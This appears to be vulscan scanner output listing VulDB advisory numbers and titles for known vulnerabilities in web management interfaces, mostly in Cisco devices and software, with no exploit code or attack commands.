| vulscan |
VulDB - https://vuldb.com:
[176763] Bosch IP Camera 7.6x/7.7x Web-based Interface cross site scripting
[176762] Bosch IP Camera Web-based Interface cross site scripting
[175484] Cisco Prime Infrastructure Web-based Management Interface os command injection
[174583] Cisco SD-WAN vManage Software Web-based Interface cross site scripting
[174582] Cisco Web Security Appliance Web-based Management Interface cross site scripting
[174581] Cisco SD-WAN vManage Software Web-based Messaging Service Interface access control
[174566] Content Security Management Appliance Web-based Management Interface information disclosure
[174542] Cisco Unified Communications Manager & Presence Service Web-based Management Interface sql injection
[174541] Cisco Unified Communications Manager IM & Presence Service Web-based Management Interface sql injection
[174342] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting
[174341] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting
[174340] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting
[174339] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting
[174329] Cisco ASA/Firepower Threat Defense Web Services Interface buffer overflow
[172641] Cisco Small Business RV Series Router Web-based Management Interface memory corruption
[172640] Cisco Small Business RV Series Router Web-based Management Interface memory corruption
[172637] Cisco RV110W/RV130/RV130W/RV215W Web-based Management Interface memory corruption
[172635] Cisco RV340/RV340W/RV345/RV345P Web-based Management Interface deserialization
[172634] Cisco RV340/RV340W/RV345/RV345P Web-based Management Interface deserialization
[172633] Cisco RV340/RV340W/RV345/RV345P Web-based Management Interface deserialization
[172632] Cisco Unified Communications Manager Web-based Management Interface cross site scripting
[172631] Cisco Unified Communications Manager Web-based Management Interface cross site scripting
[172630] Cisco Unified Communications Manager Web-based Management Interface cross site scripting
[172626] Cisco Unified Communications Manager Web-based Management Interface cross site scripting
[171946] Xerox VersaLink C9000 Web User Interface unknown vulnerability
[171944] Xerox Phaser 6510 Web User Interface unknown vulnerability
[171909] Acexy Wireless-N WiFi Repeater 28.08.06.1 Web Management Interface /password.html cleartext transmission
[171698] Cisco IOS XE Web Management Interface denial of service
[171686] Cisco IOS XE Wireless Controller Web-based Management Interface cross site scripting
[171450] Cisco RV132W ADSL2+/RV134W VDSL2 Web-based Management Interface stack-based overflow
[170349] Aruba ClearPass Policy Manager up to 6.7.14/6.8.8/6.9.4 Web-based Management Interface command injection
[170348] Aruba ClearPass Policy Manager up to 6.7.14/6.8.8/6.9.4 Web-based Management Interface command injection
[170326] Aruba ClearPass Policy Manager up to 6.7.14/6.8.8/6.9.4 Web-based Management Interface sql injection
[170325] Aruba ClearPass Policy Manager up to 6.7.14/6.8.8/6.9.4 Web-based Management Interface sql injection
[170324] Aruba ClearPass Policy Manager up to 6.7.14/6.8.8/6.9.4 Web-based Management Interface command injection
[170323] Aruba ClearPass Policy Manager up to 6.7.14/6.8.8/6.9.4 Web-based Management Interface command injection
[170320] Aruba ClearPass Policy Manager up to 6.7.14/6.8.8/6.9.4 Web-based Management Interface cross site scripting
[170203] Schneider Electric PowerLogic PM800 HTTP Web Interface cross-site request forgery
[170101] Cisco Webex Meetings Web-based Interface cross site scripting
[170034] McAfee Web Gateway up to 9.2.7 User Interface privileges management
[169271] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169270] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169269] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169268] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169267] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169266] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169265] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169264] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169263] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169262] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169261] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169260] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169259] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169258] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169257] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169256] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169255] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169254] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169253] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169252] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169251] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169250] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169249] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169248] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169247] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169246] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169245] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169244] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169243] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169242] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow
[169241] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface command injection
[169240] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface command injection
[169239] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface command injection
[169238] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface command injection
[169237] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface command injection
[169235] Cisco RV160/RV160W/RV260/RV260P/RV260W Web-based Management Interface pathname traversal
[169234] Cisco RV160/RV160W/RV260/RV260P/RV260W Web-based Management Interface pathname traversal
[169233] Cisco RV160/RV160W/RV260/RV260P/RV260W Web-based Management Interface unknown vulnerability
[169232] Cisco RV160/RV160W/RV260/RV260P/RV260W Web-based Management Interface unknown vulnerability
[169231] Cisco RV160/RV160W/RV260/RV260P/RV260W Web-based Management Interface unknown vulnerability
[169230] Cisco RV160/RV160W/RV260/RV260P/RV260W Web-based Management Interface unknown vulnerability
[169229] Cisco RV160/RV160W/RV260/RV260P/RV260W Web-based Management Interface unknown vulnerability
[169228] Cisco RV160/RV160W/RV260/RV260P/RV260W Web-based Management Interface unknown vulnerability
[169227] Cisco RV160/RV160W/RV260/RV260P/RV260W Web-based Management Interface unknown vulnerability
[168929] D-Link DIR-825 R1 up to 3.0.1 Web Interface buffer overflow
[168619] Pepperl+Fuchs P+F Comtrol IO-Link Master up to 1.5.48 Web Interface cross-site request forgery
[168562] Cisco SD-WAN vManage Software Web-based Management Interface injection
[168560] Cisco SD-WAN vManage Software Web-based Management Interface improper authorization
[168559] Cisco SD-WAN vManage Software Web-based Management Interface improper authorization
[168557] Cisco SD-WAN vManage Software Web-based Management Interface improper authorization
[168541] Cisco Web Security Appliance Web-based Management Interface cross site scripting
[168532] Cisco SD-WAN vManage Software Web-based Management Interface path traversal
[168521] Cisco SD-WAN vManage Software Web-based Management Interface sql injection
[167944] Cisco Webex Meetings Web-based Management Interface redirect
[167938] Cisco WebEx Teams Messaging Interface clickjacking
[167936] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting
[167935] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting
[167359] TP-LINK TL-WR840N 6_EU_0.9.1_4.16 Web Interface oal_ipt_addBridgeIsolationRules os command injection
[161773] Cisco Unified Communications Manager Web-based Management Interface cross site request forgery
[161771] Cisco Unity Connection Web Management Interface directory traversal
[161770] Cisco Hosted Collaboration Mediation Fulfillment Web-based Interface cross site request forgery
[161762] Cisco FirePOWER Management Center Web-based Management Interface weak authentication
[161749] Cisco Web Security Appliance Web-based Management Interface cross site scripting
[161748] Cisco Unified Communications Manager Web-based Management Interface information disclosure
[161746] Cisco Small Business RV Series Router Web-based Management Interface privilege escalation
[161282] McAfee Web Gateway up to 9.2.0 REST Interface privilege escalation
[161008] SAP BusinessObjects Business Intelligence Platform 4.1/4.2 Web Intelligence HTML Interface Stored cross site scripting
[161005] SAP Business Intelligence Platform Web Intelligence HTML Interface privilege escalation
[160990] Palo Alto PAN-OS 10.0.0 Management Web Interface memory corruption
[160987] Palo Alto PAN-OS up to 8.1.15/9.0.9/9.1.3/10.0.0 Management Web Interface denial of service
[160984] Palo Alto PAN-OS up to 8.1.5/9.0.8 Management Web Interface Reflected cross site scripting
[160746] Cisco Email Security Appliance Web-based Management Interface information disclosure
[160745] Cisco Email Security Appliance Web-based Management Interface privilege escalation
[160735] Cisco RV340 Web-based Management Interface memory corruption
[160734] Cisco RV340 Web-based Management Interface memory corruption
[160022] oVirt up to 4.4 Web Interface Reflected cross site scripting
[160007] Cisco Webex Meetings Desktop App User Interface privilege escalation
[160006] Cisco Webex Meetings Desktop App User Interface privilege escalation
[160003] Cisco UCS Director Web-based Management Interface cross site scripting
[160002] Cisco Webex Meeting Web-based Management Interface cross site scripting
[158881] Cisco ASA/Firepower Threat Defense Web Services Interface privilege escalation
[158707] Cisco RV110W/RV130/RV130W/RV215W Web-based Management Interface privilege escalation
[158706] Cisco RV110W/RV215W Web-based Management Interface memory corruption
[158705] Cisco RV110W/RV130/RV130W/RV215W Web-based Management Interface memory corruption
[158702] Cisco RV110W/RV215W Web-based Management Interface privilege escalation
[158701] Cisco RV110W/RV130/RV130W/RV215W Web-based Management Interface memory corruption
[158700] Cisco RV110W/RV130/RV130W/RV215W Web-based Management Interface memory corruption
[158699] Cisco RV110W/RV130/RV130W/RV215W Web-based Management Interface privilege escalation
[158310] Oracle WebCenter Sites 12.2.1.3.0/12.2.1.4.0 Advanced User Interface cross site scripting
[157834] Sophos XG Firewall up to 18.0 MR1 Admin Web Interface sql injection
[157626] Cisco Unified Communications Manager Web-based Management Interface cross site scripting
[157554] Cisco Identity Services Engine Web-based Management Interface cross site scripting
[156908] Cisco IP Phone 7800/IP Phone 8800 Web-based Management Interface information disclosure
[156899] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption
[156898] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption
[156897] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption
[156896] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption
[156895] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption
[156894] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption
[156893] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption
[156892] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption
[156891] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption
[156890] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption
[156889] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface memory corruption
[156888] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface privilege escalation
[156887] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface privilege escalation
[156886] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface privilege escalation
[156885] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface privilege escalation
[156884] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface privilege escalation
[156883] Cisco RV016/RV042/RV082/RV320/RV325 Web-based Management Interface privilege escalation
[156882] Cisco RV110W/RV130/RV130W/RV215W Web-based Management Interface memory corruption
[156881] Cisco RV110W/RV130/RV130W/RV215W Web-based Management Interface memory corruption
[156876] Cisco UCS Director Web-based Management Interface directory traversal
[156766] IBM Spectrum Protect up to 8.1.9.1 Web User Interface weak authentication
[156761] IBM Spectrum Protect up to 8.1.9.1 Web User Interface privilege escalation
[156509] Palo Alto PAN-OS up to 7.1.25/8.1.12 Web Management Interface privilege escalation
[156477] CipherMail Community Gateway Web Interface privilege escalation
[156110] ClearPass Policy Manager up to 6.7.13/6.8.5/6.9.0 Web UI Administrative Interface privilege escalation
[156109] ClearPass Policy Manager up to 6.7.13/6.8.5/6.9.0 Web UI Administrative Interface privilege escalation
[156108] ClearPass Policy Manager up to 6.7.13/6.8.5/6.9.0 Web Interface weak authentication
[156074] Cisco Prime Infrastructure Web-based Management Interface sql injection
[156051] Cisco IOS XE Web-based User Interface privilege escalation
[156050] Cisco IOS XE Web-based User Interface privilege escalation
[156049] Cisco IOS XE Web-based User Interface Code
[155640] Trend Micro InterScan Web Security Virtual Appliance 6.5 Web Interface cross site scripting
[155542] Cisco Prime Collaboration Provisioning Web-based Management Interface sql injection
[155223] Palo Alto PAN-OS up to 7.1.25/8.0.20/8.1.12/9.0.5 Management Web Interface DOM-Based cross site scripting
[154825] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting
[154823] Cisco FirePOWER Management Center Web Interface Redirect
[154810] Cisco ASA/Firepower Threat Defense Web Services Interface information disclosure
[154809] Cisco Hosted Collaboration Mediation Fulfillment Web-based Management Interface XML External Entity
[154799] Cisco ASA/Firepower Threat Defense Web Services Interface directory traversal
[153142] SAP Business Intelligence Platform 4.1/4.2 Web Intelligence HTML Interface cross site scripting
[151867] Cisco SD-WAN vManage Web-based Management Interface cross site scripting
[150871] Cisco Prime Collaboration Provisioning Web-based Management Interface information disclosure
[150870] Cisco Prime Collaboration Provisioning Web-based Management Interface cross site scripting
[150868] Cisco TelePresence Management Suite Web-based Management Interface cross site scripting
[150864] Cisco Email Security Appliance Web-based Management Interface privilege escalation
[150863] Cisco Identity Services Engine Web-based Management Interface cross site scripting
[150811] Netgear WNR1000V4 1.1.0.54 Web Management Interface setup.cgi cross site scripting
[150810] Netgear WNR1000V4 1.1.0.54 Web Management Interface setup.cgi privilege escalation
[150362] Cisco Cloud Web Security Web-based Management Interface sql injection
[150212] Lenovo EZ Media / Backup Center/ix2/ix2-dl up to 4.1.406.34763 Web Interface Redirect
[150094] Palo Alto PAN-OS up to 8.1.11/9.0.5 Web Interface unknown vulnerability
[149719] Cisco Identity Services Engine up to 2.6.x Web-based Management Interface Stored cross site scripting
[149360] Cisco Unity Connection Web-based Management Interface Stored cross site scripting
[149354] Cisco Crosswork Change Automation Web-based Management Interface cross site scripting
[149349] Cisco IP Phone 6800/IP Phone 7800/IP Phone 8800 Web-based Interface cross site scripting
[149348] Cisco Webex Video Mesh Web-based Management Interface privilege escalation
[149347] Cisco UCS Director Web-based Management Interface Log weak authentication
[149344] Cisco Identity Services Engine Web-based Management Interface privilege escalation
[149342] Cisco SD-WAN Solution Web Interface sql injection
[148331] Jinan USR IOT USR-WIFI232 Low Power WiFi Module 1.2.2 Web Interface cross site scripting
[146347] Cisco Small Business RV Series Router Web-based Management Interface privilege escalation
[146345] Cisco Webex Event Center Web Interface weak authentication
[146342] Cisco Unified Communications Manager Web-based Management Interface sql injection
[146340] Cisco Unified Communications Domain Manager Web-based Management Interface cross site scripting
[146336] Cisco AsyncOS/Web Security Appliance Web Management Interface privilege escalation
[146330] Cisco Wireless LAN Controller Software Web Interface privilege escalation
[146329] Cisco Small Business RV Series Router Web-based Management Interface privilege escalation
[145574] Netgear WNDR4700 1.0.0.34 Management Web Interface Credentials information disclosure
[143813] Cisco Identity Services Engine Web-based Management Interface weak authentication
[143812] Cisco Identity Services Engine Web-based Management Interface Stored cross site scripting
[143811] Cisco FirePOWER Management Center Web-based Management Interface Stored cross site scripting
[143806] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting
[143805] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting
[143804] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting
[143779] Cisco TelePresence Video Communication Server Web-based Management Interface cross site scripting
[143775] Cisco Identity Services Engine Web-based Management Interface cross site scripting
[143774] Cisco Identity Services Engine Web-based Management Interface Stored cross site scripting
[143458] D-Link DIR-412 A1-1.14WW Web Interface log_get.php weak authentication
[143406] D-Link DIR-868L/DIR-817LW Web Interface getcfg.php Credentials unknown vulnerability
[142886] Cisco Unified Communications Manager Web-based Interface cross site request forgery
[142883] Cisco Unified Communications Manager Web-based Interface privilege escalation
[142871] Cisco Unified Communications Manager Web-based Interface cross site scripting
[142870] Cisco Unified Communications Manager Web-based Interface cross site scripting
[142868] Cisco Prime Infrastructure Web-based Management Interface cross site scripting
[142867] Cisco Prime Infrastructure Web-based Management Interface cross site scripting
[142866] Cisco Unified Communications Manager Web-based Interface XML External Entity
[142865] Cisco Unified Communications Manager Web-based Interface sql injection
[142864] Cisco Unified Communications Web-based Interface cross site scripting
[142853] Cisco FirePOWER Management Center Web-based Management Interface directory traversal
[142851] Cisco FirePOWER Management Center Web-based Management Interface privilege escalation
[142848] Cisco FirePOWER Management Center Web-based Management Interface sql injection
[142847] Cisco FirePOWER Management Center Web-based Management Interface sql injection
[142846] Cisco FirePOWER Management Center Web-based Management Interface sql injection
[142845] Cisco FirePOWER Management Center Web-based Management Interface sql injection
[142844] Cisco FirePOWER Management Center Web-based Management Interface sql injection
[142843] Cisco FirePOWER Management Center Web-based Management Interface sql injection
[142842] Cisco FirePOWER Management Center Web-based Management Interface sql injection
[142841] Cisco FirePOWER Management Center Web-based Management Interface sql injection
[142834] Cisco Identity Services Engine Web-based Management Interface cross site scripting
[142275] Cisco IOS XE Web-based User Interface privilege escalation
[142274] Cisco IOS XE Web-based User Interface privilege escalation
[141302] Nagios XI up to 5.6.5 Web Interface profile.php privilege escalation
[141291] Canon PRINT jp.co.canon.bsd.ad.pixmaprint 2.5.5 on Android Administrator Web Interface information disclosure
[141272] Cisco Identity Services Engine Web-based Management Interface cross site scripting
[140698] Fortinet FortiOS up to 6.2.0 Admin Web Interface information disclosure
[140570] Cisco Integrated Management Controller Web-based Management Interface weak authentication
[140568] Cisco UCS Director/UCS Director Express for Big Data Web-based Management Interface weak authentication
[140567] Cisco Integrated Management Controller Web-based Management Interface weak authentication
[140566] Cisco Integrated Management Controller Web-based Management Interface privilege escalation
[140531] Cisco IOS XE NGWC Web-based Management Interface cross site request forgery
[139684] Cisco WebEx Meetings Server Web-based Management Interface Redirect
[139680] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting
[139665] Cisco ASA Web-based Management Interface privilege escalation
[139272] 3proxy up to 0.8.12 Admin Interface webadmin.c memory corruption
[138277] Cisco Identity Services Engine up to 2.6.0 Sponsor Portal Web Interface sql injection
[138276] Cisco Identity Services Engine Web-based Management Interface cross site scripting
[137428] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting
[137427] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting
[137263] Moxa OnCell G3470A-LTE up to 1.6 Build 18021314 Web Interface denial of service
[137262] Moxa OnCell G3100-HSPA up to 1.6 Build 17100315 Web Interface memory corruption
[137259] Moxa OnCell G3100-HSPA up to 1.5 Build 17042015 Web Interface denial of service
[136772] Dell EMC Avamar ADMe Web Interface 1.0.50/1.0.51 privilege escalation
[136740] Cisco RV110W/RV130W/RV215W Web-based Management Interface privilege escalation
[136739] Cisco RV110W/RV130W/RV215W Web-based Management Interface privilege escalation
[136731] Cisco RV110W Wireless-N VPN Firewall Web-based Management Interface privilege escalation
[136458] BD Alaris Gateway Web Browser User Interface privilege escalation
[136210] Moxa AWK-3121 1.14 Web Interface iw_webSetParameters cross site request forgery
[136036] Cisco Enterprise Chat/Email Center Web-based Management Interface cross site scripting
[136035] Cisco WebEx Meetings Server Web-based Management Interface information disclosure
[135677] Yeahlink Ultra-elegant IP Phone SIP-T41P 66.83.0.35 Diagnostics Web Interface directory traversal
[135676] Yeahlink Ultra-elegant IP Phone SIP-T41P 66.83.0.35 Web Interface cross site request forgery
[135136] Cisco Prime Infrastructure/Evolved Programmable Network Web-based Management Interface SQL sql injection
[135135] Cisco Prime Infrastructure/Evolved Programmable Network Web-based Management Interface SQL sql injection
[135134] Cisco Prime Infrastructure/Evolved Programmable Network Web-based Management Interface privilege escalation
[135133] Cisco Prime Infrastructure/Evolved Programmable Network Web-based Management Interface privilege escalation
[135132] Cisco Prime Infrastructure/Evolved Programmable Network Web-based Management Interface privilege escalation
[135131] Cisco Prime Infrastructure/Evolved Programmable Network Web-based Management Interface directory traversal
[135130] Cisco Prime Infrastructure/Evolved Programmable Network Web-based Management Interface directory traversal
[135129] Cisco Prime Infrastructure/Evolved Programmable Network Web-based Management Interface directory traversal
[135069] Cisco Video Surveillance Manager Web-based Management Interface directory traversal
[134669] Cisco IOS XE Web-based User Interface privilege escalation
[134622] Virgin Media Wireless Router 3.0 Web Interface Persistent denial of service
[134367] Cisco Prime Collaboration Assurance Web-based Management Interface cross site scripting
[134353] Cisco ASA Web-based Management Interface cross site request forgery
[134038] TIBCO ActiveMatrix BPM Administrator Web Interface cross site request forgery
[133805] Cisco FirePOWER Management Center 6.2.3/6.3.0/6.4.0 Web-based Management Interface cross site scripting
[133802] Cisco Wireless LAN Controller up to 8.3/8.5/8.8 Web-based Management Interface cross site request forgery
[133796] Cisco up to X12.5.0 Web-based Management Interface cross site request forgery
[133793] Cisco Identity Services Engine 2.1 Web-based Management Interface cross site scripting
[133792] Cisco Identity Services Engine 2.1 Web Interface denial of service
[133778] Cisco Wireless LAN Controller up to 8.1/8.5 Web-based Interface Hijacking weak authentication
[133251] HPE Integrated Lights-Out 5 up to 1.39 Web User Interface cross site scripting
[132764] CUPS up to 2.2.9 on Linux Web Interface information disclosure
[132103] Cisco IP Phone 8800 Web-based Management Interface privilege escalation
[132102] Cisco IP Phone 8800 Web-based Management Interface directory traversal
[132101] Cisco IP Phone 8800 Web-based Management Interface cross site request forgery
[132100] Cisco IP Phone 8800 Web-based Management Interface privilege escalation
[132099] Cisco IP Phone 7800/IP Phone 8800 Web-based Management Interface privilege escalation
[131934] Solarwinds Serv-U FTP Server 15.1.6.25 Web Management Interface Reflected cross site scripting
[131571] Cisco Enterprise Chat/Email 11.6(1) Web-based Management Interface cross site scripting
[130682] Cisco Identity Services Engine Web-based Management Interface cross site scripting
[130638] Cisco TelePresence Conductor up to XC4.3.3 Web Interface privilege escalation
[130634] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting
[130632] Cisco TelePresence Management Suite Web-based Management Interface cross site scripting
[130566] CA Automic Workload Automation 12.0 Automic Web Interface Persistent cross site scripting
[130343] Palo Alto PAN-OS up to 7.1.21/8.0.14/8.1.5 Management Web Interface cross site scripting
[130247] Cisco WebEx Meetings Server Web-based Management Interface cross site scripting
[130246] Cisco RV320/RV325 Web-based Management Interface privilege escalation
[130245] Cisco RV320/RV325 Web-based Management Interface privilege escalation
[130222] Cisco Prime Infrastructure Web-based Management Interface cross site scripting
[130221] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting
[130127] Cisco Identity Services Engine Administrative Web Interface privilege escalation
[129744] Cisco Identity Services Engine Web-based Management Interface Reflected cross site scripting
[129743] Cisco Identity Services Engine Web-based Management Interface Stored cross site scripting
[129043] Cisco TelePresence Management Suite Web-based Management Interface cross site scripting
[128999] Cisco Prime Infrastructure Web-based Management Interface cross site scripting
[128990] Cisco Unified Communications Manager Web-based Management Interface Credentials privilege escalation
[128368] Cisco ASA Web Management Interface privilege escalation
[126586] Cisco Video Surveillance Media Server Web-based Management Interface privilege escalation
[125799] SV3C L-SERIES HD CAMERA Web Interface Redirect
[125797] SV3C L-SERIES HD CAMERA V2.3.4.2103-S50-NTD-B20170508B Web Interface Technical information disclosure
[125728] Cisco Prime Collaboration Assurance Web-based Management Interface cross site request forgery
[125710] Cisco Wireless LAN Controller Software Web-based Interface directory traversal
[125708] Cisco Wireless LAN Controller Web-based Interface privilege escalation
[125706] Cisco Wireless LAN Controller Web-based Interface cross site scripting
[125668] D-Link DWR-111 Web Interface directory traversal
[125227] Siemens SIMATIC S7-1200 up to 4.2.2 Web Interface cross site request forgery
[124937] Cisco WebEx Training Center Web-based Management Interface cross site scripting
[124936] Cisco Unified IP Phone Web-based Management Interface cross site scripting
[124928] Cisco Unity Connection Web-based Interface Stored cross site scripting
[124927] Cisco Identity Services Engine Web-based Management Interface privilege escalation
[124926] Cisco Identity Services Engine Web-based Management Interface privilege escalation
[124908] Cisco UCS Director Web-based Management Interface Stored cross site scripting
[124907] Cisco Integrated Management Controller Web Interface information disclosure
[124906] Cisco Integrated Management Controller Web Interface denial of service
[124904] Cisco Hosted Collaboration Mediation Fulfillment Web-based Management Interface cross site request forgery
[124903] Cisco Cloud Services Platform 2100 Web-based Management Interface cross site scripting
[124895] Cisco Prime Collaboration Provisioning Administrative Web Interface privilege escalation
[124861] Cisco IOS XE Web User Interface memory corruption
[124852] Cisco Prime Collaboration Assurance Web-based Management Interface cross site scripting
[124849] Cisco Cloud Services Platform 2100 Web-based Management Interface privilege escalation
[124838] Cisco Meeting Server Web-based Management Interface cross site request forgery
[124828] Cisco RV110W/RV130W/RV215W Web-based Management Interface directory traversal
[124827] Cisco RV110W/RV130W/RV215W Web-based Management Interface privilege escalation
[124826] Cisco RV110W/RV130W/RV215W Web-based Management Interface privilege escalation
[124825] Cisco RV110W/RV130W/RV215W Web-based Management Interface memory corruption
[124652] TP-LINK TL-WRN841N 0.9.1 4.16 v0348.0 Web Interface cross site request forgery
[124651] TP-LINK TL-WRN841N 0.9.1 4.16 v0348.0 Web Interface privilege escalation
[124650] TP-LINK TL-WRN841N 0.9.1 4.16 v0348.0 Web Interface privilege escalation
[124237] Foscam C1 Indoor HD Camera 2.52.2.43 Web Management Interface memory corruption
[124233] Foscam C1 Indoor HD Camera 2.52.2.43 Web Management Interface privilege escalation
[122978] Palo Alto PAN-OS up to 8.1.2 Management Web Interface privilege escalation
[122482] Cisco Identity Services Engine Web-based Management Interface cross site request forgery
[122481] Cisco Unified Communications Manager Web-based Management Interface Reflected cross site scripting
[122478] Cisco Web Security Appliance Web-based Management Interface Reflected cross site scripting
[122462] Foreman up to 1.12.x Web Interface Stored cross site scripting
[122134] Dahua IP Camera Web Interface /usr/bin/sonia memory corruption
[122098] McAfee Web Gateway 7.8.1.x Administrative Interface privilege escalation
[121501] Cisco Web Security Appliance Web-based Management Interface Reflected cross site scripting
[121371] Cisco IP Phone 6800/7800/8800 Series Web-based User Interface privilege escalation
[120478] ADB Broadband Router on Epicentro Web Interface privilege escalation
[119783] Cisco Meeting Server Web Admin Interface privilege escalation
[119782] Cisco FirePOWER Management Center Web-based Management Interface cross site request forgery
[119781] Cisco Unified Communications Domain Manager Web-based Management Interface cross site request forgery
[119780] Cisco Unified Communications Manager Web-based Management Interface cross site request forgery
[119766] Cisco FXOS/Firepower 4100/Firepower 9300 Web-based User Interface directory traversal
[119243] Cisco Identity Services Engine Web-based Management Interface cross site scripting
[119235] Cisco Prime Collaboration Provisioning 12.1 Web Management Interface privilege escalation
[117103] Catapult UK Cookie Consent Plugin up to 2.3.9 on WordPress Web Interface Persistent cross site scripting
[117046] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation
[117045] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation
[116891] Cisco WebEX Connect IM Web Interface cross site scripting
[116875] Cisco ASA Web-based Management Interface cross site scripting
[115192] Cisco IOS XE Web-based User Interface privilege escalation
[115189] Cisco IOS XE Web-based User Interface cross site scripting
[115187] Cisco IOS XE Web-based User Interface cross site scripting
[115186] Cisco IOS XE Web-based User Interface cross site scripting
[115158] Cisco IOS XE 16.1.1 Web-based User Interface privilege escalation
[114214] Cisco Unified Computing System Web-based Management Interface cross site scripting
[114213] Cisco Secure Access Control Server up to 5.8 Patch 8 Web-based User Interface information disclosure
[114211] Cisco Identity Services Engine Web-based Management Interface cross site request forgery
[114210] Cisco Identity Services Engine Web-based Management Interface cross site request forgery
[114207] Cisco Identity Services Engine Web-based Management Interface cross site scripting
[114181] SO Connect SO WIFI Hotspot Web Interface up to 139 Redirect
[113943] Parallels Remote Application Server 15.5 Build 16140 Web Interface RASHTML5Gateway/ directory traversal
[113678] Cisco Unified Communications Manager Web-based Management Interface Reflected cross site scripting
[113671] Cisco UCS Director Software Web Management Interface cross site request forgery
[112984] Cisco RV132W 1.0.1.11 Web Interface privilege escalation
[112333] PowerDNS Recursor up to 4.0.6 Web Interface cross site scripting
[112211] Cisco Prime Infrastructure Web Interface Redirect
[112207] Cisco Web Security Appliance Web-based Management Interface Reflected cross site scripting
[112205] Cisco Identity Services Engine Web-based Management Interface DOM-Based cross site scripting
[111731] Cisco Unified Communications Manager Web-based Management Interface cross site scripting
[110916] XiongMai IP Camera/DVR NetSurveillance Web Interface memory corruption
[110490] Palo Alto PAN-OS up to 6.1.18/7.0.18/7.1.13 Web Interface privilege escalation
[110488] Palo Alto PAN-OS up to 6.1.18/7.0.18/7.1.13/8.0.5 Web Interface privilege escalation
[110084] Cisco Unified Communications Manager Web-based Management Interface cross site scripting
[110081] Cisco Secure Access Control System Web Interface information disclosure
